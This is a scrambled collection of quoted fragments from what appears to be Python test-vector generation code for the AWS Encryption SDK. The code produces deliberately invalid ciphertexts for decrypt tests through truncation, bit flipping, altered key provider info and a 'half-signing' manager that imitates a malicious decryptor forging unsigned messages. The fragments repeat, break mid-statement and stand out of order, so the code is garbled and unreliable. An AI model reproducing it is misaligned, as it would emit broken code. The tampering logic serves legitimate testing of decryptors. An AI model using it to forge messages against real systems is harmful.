Mapping", "message encrypt manifest. :param file input_file: File object for file", "root_dir = os.path.abspath(target_directory) root_writer = file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer", "materials_manager = DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result:", "# We only actually need these imports when running the", "Generation. \"\"\" import json import os import uuid from copy", "_generate_plaintexts(plaintexts_specs): # type: (PLAINTEXTS_SPEC) -> Dict[str, bytes] \"\"\"Generate required plaintext", "\"\"\"Data class for a single full message decrypt test scenario.", "MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result, ), ) @attr.s", "= LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0, max_messages_encrypted=100, )", "six.string_types)) def __init__(self, new_provider_infos): \"\"\"Create a new instance for a", "Encryption SDK Decrypt Message Generation. \"\"\" import json import os", "of spaces to indent JSON files (optional: default is to", "wrapped CMM, and then change the provider info on each", "plaintext data for this scenario :return: Decrypt test scenario that", "(ciphertext, result) pairs. \"\"\" master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn() # Use a", "the resulting ciphertext with ``ciphertext_writer`` and returning a :class:`MessageDecryptionTestScenario` that", "full message encrypt manifest. 
:param file input_file: File object for", "dictionary_validator, file_reader, file_writer, iterable_validator, membership_validator, validate_manifest_type, ) from awses_test_vectors.manifests.full_message.decrypt import", ":rtype: dict \"\"\" return {name: os.urandom(size) for name, size in", "implied. See the License for the specific # language governing", "may not use this file except in compliance with the", "pairs. \"\"\" master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn() # Use a caching CMM", "scenario, tampering with the input or the result. return: a", "BITS_PER_BYTE) result = bytearray(ciphertext) result[byte_index] ^= 1 << (BITS_PER_BYTE -", "half-signing materials by requesting signing materials from the wrapped default", "removing the signing key from teh result. \"\"\" if request.algorithm", "encryption context. THIS IS ONLY USED TO CREATE INVALID MESSAGES", "this scenario, writing the resulting ciphertext with ``ciphertext_writer`` and returning", "# # Licensed under the Apache License, Version 2.0 (the", "import MessageEncryptionTestScenario from awses_test_vectors.manifests.keys import KeysManifest try: from aws_encryption_sdk.identifiers import", "expected_result ) class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that modifies the", "from_file(cls, input_file): # type: (IO) -> MessageDecryptionGenerationManifest \"\"\"Load from a", "Callable, Dict, Iterable, Optional # noqa pylint: disable=unused-import from awses_test_vectors.internal.mypy_types", "URI locating the written data :param str plaintext_uri: URI locating", "json.load(input_file) validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS ) parent_dir = os.path.abspath(os.path.dirname(input_file.name)) reader", "type_name = \"awses-decrypt-generate\" @staticmethod def _generate_plaintexts(plaintexts_specs): # type: (PLAINTEXTS_SPEC) ->", "= TamperingMethod.from_tampering_spec(tampering) decryption_method_spec = scenario.get(\"decryption-method\") decryption_method = DecryptionMethod(decryption_method_spec) if decryption_method_spec", "plaintext) for name, plaintext in self.plaintexts.items()} ciphertext_writer = file_writer(os.path.join(root_dir, \"ciphertexts\"))", ") @attr.s class MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption SDK Decryption Message Generation", "to indent JSON files (optional: default is to write minified)", "plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests = {} for name, scenario in", "of master key specifications :type decryption_master_key_specs: iterable of :class:`MasterKeySpec` :param", "decryption scenario) pair\"\"\" ciphertext_name = str(uuid.uuid4()) ciphertext_uri = ciphertext_writer(ciphertext_name, ciphertext_to_decrypt)", "to attempt to forge an unsigned message from a decrypted", "return result def decrypt_materials(self, request): \"\"\"Thunks to the wrapped CMM\"\"\"", "Dict[str, bytes] \"\"\"Generate required plaintext values. 
:param dict plaintexts_specs: Mapping", "generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated at byte {}\".format(length)), ) for length", "range(1, len(ciphertext_to_decrypt)) ] class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the", ":param file input_file: File object for file containing JSON manifest", "changing the algorithm suite and removing the signing key from", "ENCODING from awses_test_vectors.internal.util import ( dictionary_validator, file_reader, file_writer, iterable_validator, membership_validator,", "the written data :param str plaintext_uri: URI locating the written", "== \"change-edk-provider-info\": return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise ValueError(\"Unrecognized tampering method tag: \"", "decrypt_manifest = MessageDecryptionManifest( keys_uri=\"file://keys.json\", keys=self.keys, test_scenarios=test_scenarios ) root_writer(\"manifest.json\", json.dumps(decrypt_manifest.manifest_spec, indent=json_indent).encode(ENCODING))", "{name: os.urandom(size) for name, size in plaintexts_specs.items()} @classmethod def from_file(cls,", "= MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)", "the wrapped CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8 class TruncateTamperingMethod(TamperingMethod):", "for new_provider_info in self.new_provider_infos ] def run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario,", "without encryption permissions might do, to attempt to forge an", "BITS_PER_BYTE = 8 class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method that truncates a", ") except NotImplementedError: continue return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys, plaintexts=plaintexts, tests=tests) def", "raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys = KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests", "( ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result, ),", "given bit in the given ciphertext\"\"\" byte_index, bit_index = divmod(bit,", "Scenario specification JSON :param KeysManifest keys: Loaded keys :param dict", "only actually need these imports when running the mypy checks", "zero).\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\"", "master key provider. \"\"\" self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self, request):", "= MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else None return cls( encryption_scenario=encryption_scenario,", "= os.path.abspath(target_directory) root_writer = file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer =", "then change the provider info on each EDK. 
\"\"\" result", "decryption_method: :param decryption_master_key_specs: Iterable of master key specifications :type decryption_master_key_specs:", "in range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE) ] @classmethod def flip_bit(cls, ciphertext,", "encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs", "decryption_method=self.decryption_method, result=expected_result, ), ) @attr.s class MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption SDK", "scenario=scenario, keys=keys, plaintexts=plaintexts ) except NotImplementedError: continue return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys,", "required plaintext values. :param dict plaintexts_specs: Mapping of plaintext name", "master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn() # Use a caching CMM to avoid", "wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self, master_key_provider): \"\"\" Create a new", "= encryption_scenario.master_key_provider_fn result_spec = scenario.get(\"result\") result = MessageDecryptionTestResult.from_result_spec(result_spec, None) if", "import IO, Callable, Dict, Iterable, Optional # noqa pylint: disable=unused-import", "of plaintext name to size in bytes :return: Mapping of", "an unsigned algorithm suite that includes the \"aws-crypto-public-key\" encryption context.", "a given new provider info value.\"\"\" self.new_provider_infos = new_provider_infos @classmethod", "with ``ciphertext_writer`` and returning a :class:`MessageDecryptionTestScenario` that describes the matching", "} decrypt_manifest = MessageDecryptionManifest( keys_uri=\"file://keys.json\", keys=self.keys, test_scenarios=test_scenarios ) root_writer(\"manifest.json\", json.dumps(decrypt_manifest.manifest_spec,", "json_indent=None): # type: (str, Optional[int]) -> None \"\"\"Process all known", "Decryption Message Generation manifest handler. Described in AWS Crypto Tools", "HalfSigningTamperingMethod() ((tampering_tag, tampering_values_spec),) = spec.items() if tampering_tag == \"change-edk-provider-info\": return", "Copyright 2018 Amazon.com, Inc. or its affiliates. 
All Rights Reserved.", "result.encrypted_data_keys: encrypted_data_key.key_provider.key_info = self.new_provider_info return result def decrypt_materials(self, request): \"\"\"Thunks", "length in range(1, len(ciphertext_to_decrypt)) ] class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method that", "an unsigned message from a decrypted signed message, and therefore", "validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS ) parent_dir = os.path.abspath(os.path.dirname(input_file.name)) reader =", ":param MessageEncryptionTestScenario encryption_scenario: Encryption parameters :param tampering_method: Optional method used", "[ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM", "tampering_tag == \"change-edk-provider-info\": return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise ValueError(\"Unrecognized tampering method tag:", "= attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name = \"awses-decrypt-generate\"", "except ImportError: from aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite from awses_test_vectors.manifests.master_key", "\"\"\" materials_manager = DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager) if", "MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec = scenario[\"encryption-scenario\"] encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts)", "changes the provider info on all EDKs.\"\"\" # pylint: disable=R0201", "field on EDKS. THIS IS ONLY USED TO CREATE INVALID", "plaintext names to plaintext values :return: Loaded test scenario :rtype:", "a public key\" ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ]", "important case for ESDKs to reject. \"\"\" wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager))", "decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, ) def run(self, ciphertext_writer, plaintext_uri): \"\"\"Run this", "def get_encryption_materials(self, request): \"\"\" Request materials from the wrapped CMM,", "from_tampering_spec(cls, spec): \"\"\"Load from a tampering specification\"\"\" if spec is", "tampering_method=tampering_method, decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, ) def run(self, ciphertext_writer, plaintext_uri):", "writing the resulting ciphertext with ``ciphertext_writer`` and returning a :class:`MessageDecryptionTestScenario`", "to plaintext values :param dict tests: Mapping of test scenario", "EDKs.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\"", "a full message encrypt manifest. :param file input_file: File object", "containing a full message encrypt manifest. 
:param file input_file: File", "in the \"license\" file accompanying this file. This file is", "tampering specification\"\"\" if spec is None: return TamperingMethod() if spec", "size in plaintexts_specs.items()} @classmethod def from_file(cls, input_file): # type: (IO)", "# language governing permissions and limitations under the License. \"\"\"", "to randomly generated bytes :rtype: dict \"\"\" return {name: os.urandom(size)", "key every time. cache = LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider,", "awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario from awses_test_vectors.manifests.keys import KeysManifest try: from aws_encryption_sdk.identifiers", "new_provider_info ) for new_provider_info in self.new_provider_infos ] def run_scenario_with_new_provider_info( self,", ":rtype: MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def decryption_test_scenario_pair(self, ciphertext_writer,", "(name, decryption scenario) pair\"\"\" ciphertext_name = str(uuid.uuid4()) ciphertext_uri = ciphertext_writer(ciphertext_name,", "\"\"\"Run with tampering for a specific new provider info value\"\"\"", "return generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result ) class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom", "names to plaintext values :param dict tests: Mapping of test", "signing key from teh result. \"\"\" if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY:", "the ciphertext :type tampering_method: :class:`TamperingMethod` :param decryption_method: :param decryption_master_key_specs: Iterable", "Message Generation. :param int version: Version of this manifest :param", "str plaintext_uri: URI locating the written plaintext data for this", "1) return bytes(result) class MutateTamperingMethod(TamperingMethod): \"\"\"Tampering method that produces a", "at byte {}\".format(length)), ) for length in range(1, len(ciphertext_to_decrypt)) ]", "new_provider_info ): \"\"\"Run with tampering for a specific new provider", "class for all tampering methods.\"\"\" @classmethod def from_tampering_spec(cls, spec): \"\"\"Load", "disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\" Run a given", "key specifications :type decryption_master_key_specs: iterable of :class:`MasterKeySpec` :param Callable decryption_master_key_provider_fn:", "MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys, plaintexts=plaintexts ) except NotImplementedError: continue return cls(version=raw_manifest[\"manifest\"][\"version\"],", "in self.new_provider_infos ] def run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info", "from a file containing a full message encrypt manifest. :param", "with the input or the result. return: a list of", "\"truncate\": return TruncateTamperingMethod() if spec == \"mutate\": return MutateTamperingMethod() if", "spaces to indent JSON files (optional: default is to write", "and removing the signing key from teh result. 
\"\"\" if", "if result_spec else None return cls( encryption_scenario=encryption_scenario, tampering_method=tampering_method, decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs,", "feature #0006 AWS Encryption SDK Decrypt Message Generation. \"\"\" import", "import six from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager", "(str, Optional[int]) -> None \"\"\"Process all known encrypt test scenarios", "= json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys = KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests =", "= MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys, plaintexts=plaintexts ) except NotImplementedError: continue return", "return {name: os.urandom(size) for name, size in plaintexts_specs.items()} @classmethod def", "info field on EDKS. THIS IS ONLY USED TO CREATE", "plaintext=generation_scenario.encryption_scenario.plaintext ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class ChangeEDKProviderInfoTamperingMethod(TamperingMethod):", "ciphertext_writer: Callable that will write the requested named ciphertext and", "byte_index, bit_index = divmod(bit, BITS_PER_BYTE) result = bytearray(ciphertext) result[byte_index] ^=", "generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result: expected_result = generation_scenario.result", ":param int version: Version of this manifest :param KeysManifest keys:", "data :param str plaintext_uri: URI locating the written plaintext data", "except in compliance with the License. A copy of #", "file_reader, file_writer, iterable_validator, membership_validator, validate_manifest_type, ) from awses_test_vectors.manifests.full_message.decrypt import (", "@attr.s class MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption SDK Decryption Message Generation manifest", "six from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from", "files (optional: default is to write minified) \"\"\" root_dir =", "(ciphertext, result) pairs. \"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair(", "len(ciphertext_to_decrypt)) ] class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider", "scenario.run( ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() } decrypt_manifest = MessageDecryptionManifest( keys_uri=\"file://keys.json\", keys=self.keys,", "ciphertext_writer(ciphertext_name, ciphertext_to_decrypt) return ( ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn,", "be used in production! It is imitating what a malicious", "or in the \"license\" file accompanying this file. This file", "or the result. 
return: a list of (ciphertext, result) pairs.", "Decrypt test scenario that describes the generated scenario :rtype: MessageDecryptionTestScenario", "test scenarios and write the resulting data and manifests to", "data and manifests to disk. :param str target_directory: Directory in", "for name, plaintext in self.plaintexts.items()} ciphertext_writer = file_writer(os.path.join(root_dir, \"ciphertexts\")) test_scenarios", "ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit", "locating the written data :param str plaintext_uri: URI locating the", "def from_values_spec(cls, values_spec): \"\"\"Load from a tampering parameters specification\"\"\" return", "the wrapped default CMM\"\"\" return self.wrapped_default_cmm.decrypt_materials(request) @attr.s class MessageDecryptionTestScenarioGenerator(object): #", "= scenario.get(\"result\") result = MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else None", "info value.\"\"\" self.new_provider_infos = new_provider_infos @classmethod def from_values_spec(cls, values_spec): \"\"\"Load", "IS ONLY USED TO CREATE INVALID MESSAGES and should never", "\"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated", "bytes :return: Mapping of plaintext name to randomly generated bytes", "DefaultCryptoMaterialsManager based on the given master key provider. \"\"\" self.wrapped_default_cmm", "plaintexts: Mapping of plaintext names to plaintext values :param dict", "if spec is None: return TamperingMethod() if spec == \"truncate\":", "data key provider info: \" + new_provider_info ) return generation_scenario.decryption_test_scenario_pair(", "manifest specs. :param MessageEncryptionTestScenario encryption_scenario: Encryption parameters :param tampering_method: Optional", "permissions might do, to attempt to forge an unsigned message", "file_writer, iterable_validator, membership_validator, validate_manifest_type, ) from awses_test_vectors.manifests.full_message.decrypt import ( DecryptionMethod,", "decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, ) def run(self, ciphertext_writer, plaintext_uri): \"\"\"Run", "ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Incorrect encrypted data key", "= str(uuid.uuid4()) ciphertext_uri = ciphertext_writer(ciphertext_name, ciphertext_to_decrypt) return ( ciphertext_name, MessageDecryptionTestScenario(", "ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result, ), )", "root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris = {name:", "suite that includes the \"aws-crypto-public-key\" encryption context. 
THIS IS ONLY", "class ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider info on", "len(ciphertext_to_decrypt) * BITS_PER_BYTE) ] @classmethod def flip_bit(cls, ciphertext, bit): \"\"\"Flip", "result. \"\"\" if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request = copy(request) signing_request.algorithm", "iterable of :class:`MasterKeySpec` :param Callable decryption_master_key_provider_fn: :param result: \"\"\" encryption_scenario", "== \"truncate\": return TruncateTamperingMethod() if spec == \"mutate\": return MutateTamperingMethod()", "scenario: Scenario specification JSON :param KeysManifest keys: Loaded keys :param", "iterable_validator, membership_validator, validate_manifest_type, ) from awses_test_vectors.manifests.full_message.decrypt import ( DecryptionMethod, MessageDecryptionManifest,", "generated scenario :rtype: MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def", "manifest. :param file input_file: File object for file containing JSON", "plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name =", "generation_scenario.encryption_scenario.master_key_provider_fn() # Use a caching CMM to avoid generating a", "includes the \"aws-crypto-public-key\" encryption context. THIS IS ONLY USED TO", "decrypted signed message, and therefore this is an important case", ":param callable ciphertext_writer: Callable that will write the requested named", "= DecryptionMethod(decryption_method_spec) if decryption_method_spec else None if \"decryption-master-keys\" in scenario:", "a new instance for a given new provider info value.\"\"\"", "default is to write minified) \"\"\" root_dir = os.path.abspath(target_directory) root_writer", "dict plaintexts: Mapping of plaintext names to plaintext values :return:", "Decrypt Message Generation. \"\"\" import json import os import uuid", "in scenario[\"decryption-master-keys\"] ] def decryption_master_key_provider_fn(): return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs) else: decryption_master_key_specs", "def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\" Run a given scenario,", "result.algorithm = request.algorithm result.signing_key = None return result raise NotImplementedError(", "using a data key with a public key\" ) return", "materials_manager, new_provider_info ): \"\"\"Run with tampering for a specific new", "in production! 
\"\"\" wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types)) def", "Custom CMM that modifies the provider info field on EDKS.", "return [ self.run_scenario_with_new_provider_info( ciphertext_writer, generation_scenario, caching_cmm, new_provider_info ) for new_provider_info", "that wraps a new DefaultCryptoMaterialsManager based on the given master", "file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys = KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"])", "specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario,", "a tampering parameters specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201 def", "new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types)) def __init__(self, materials_manager, new_provider_info): \"\"\"Create a new", "OR CONDITIONS OF # ANY KIND, either express or implied.", "continue return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys, plaintexts=plaintexts, tests=tests) def run_and_write_to_dir(self, target_directory, json_indent=None):", "\"\"\"Load from a file containing a full message encrypt manifest.", "all tampering methods.\"\"\" @classmethod def from_tampering_spec(cls, spec): \"\"\"Load from a", "CMM that wraps a new DefaultCryptoMaterialsManager based on the given", "change the provider info on each EDK. \"\"\" result =", "= (2,) class TamperingMethod: \"\"\"Base class for all tampering methods.\"\"\"", "key provider. \"\"\" self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self, request): \"\"\"", "that includes the \"aws-crypto-public-key\" encryption context. THIS IS ONLY USED", "= file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris = {name: plaintext_writer(name, plaintext) for name,", "generation_scenario, caching_cmm, new_provider_info ) for new_provider_info in self.new_provider_infos ] def", "= attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec)) decryption_master_key_provider_fn", "= attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator))", "disk. :param str target_directory: Directory in which to write all", "decrypt test scenario. Handles serialization and deserialization to and from", "int version: Version of this manifest :param KeysManifest keys: Loaded", "\"\"\"Load from a tampering specification\"\"\" if spec is None: return", "awses_test_vectors.internal.mypy_types import ( # noqa pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC, )", "and write the resulting data and manifests to disk. 
:param", "distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS", "tampering_method: :class:`TamperingMethod` :param decryption_method: :param decryption_master_key_specs: Iterable of master key", "KeysManifest try: from aws_encryption_sdk.identifiers import AlgorithmSuite except ImportError: from aws_encryption_sdk.identifiers", "bytes :rtype: dict \"\"\" return {name: os.urandom(size) for name, size", ") from awses_test_vectors.manifests.full_message.decrypt import ( DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario, )", "and deserialization to and from manifest specs. :param MessageEncryptionTestScenario encryption_scenario:", "MessageDecryptionTestScenario, ) from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario from awses_test_vectors.manifests.keys import KeysManifest", "2.0 (the \"License\"). You # may not use this file", "possible bit.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):", "\"\"\" encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod)))", "ciphertext and return a URI locating the written data :param", "\"\"\"Run this scenario, writing the resulting ciphertext with ``ciphertext_writer`` and", "never be used in production! It is imitating what a", "A copy of # the License is located at #", "in plaintexts_specs.items()} @classmethod def from_file(cls, input_file): # type: (IO) ->", "disable=unused-import from awses_test_vectors.internal.mypy_types import ( # noqa pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC,", "MessageEncryptionTestScenario encryption_scenario: Encryption parameters :param tampering_method: Optional method used to", "wrapped CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8 class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering", ":rtype: MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec = scenario[\"encryption-scenario\"] encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys,", "return bytes(result) class MutateTamperingMethod(TamperingMethod): \"\"\"Tampering method that produces a message", "will write the requested named ciphertext and return a URI", "result. return: a list of (ciphertext, result) pairs. \"\"\" ciphertext_to_decrypt", "method that changes the provider info on all EDKs.\"\"\" #", "data for this scenario :return: Decrypt test scenario that describes", "except ImportError: # pragma: no cover # We only actually", "self.wrapped_default_cmm.decrypt_materials(request) @attr.s class MessageDecryptionTestScenarioGenerator(object): # pylint: disable=too-many-instance-attributes \"\"\"Data class for", "Decrypt Message Generation manifest handler. Described in AWS Crypto Tools", "), ) @attr.s class MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption SDK Decryption Message", "Optional # noqa pylint: disable=unused-import from awses_test_vectors.internal.mypy_types import ( #", "what a malicious decryptor without encryption permissions might do, to", "the \"aws-crypto-public-key\" encryption context. 
THIS IS ONLY USED TO CREATE", "\" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\" ) def decrypt_materials(self, request): \"\"\"Thunks to", "generation_scenario, plaintext_uri): \"\"\" Run a given scenario, tampering with the", "message from a decrypted signed message, and therefore this is", "Decrypt Message Generation. :param int version: Version of this manifest", "return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise ValueError(\"Unrecognized tampering method tag: \" + tampering_tag)", "wraps a new DefaultCryptoMaterialsManager based on the given master key", "\"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result):", "input or the result. return: a list of (ciphertext, result)", "to :class:`MessageDecryptionGenerationManifest`s \"\"\" version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS)) keys = attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts", "materials for an unsigned algorithm suite that includes the \"aws-crypto-public-key\"", "for this scenario :return: Decrypt test scenario that describes the", "a new CMM that wraps a new DefaultCryptoMaterialsManager based on", "\"\"\" Run a given scenario, tampering with the input or", "\" + 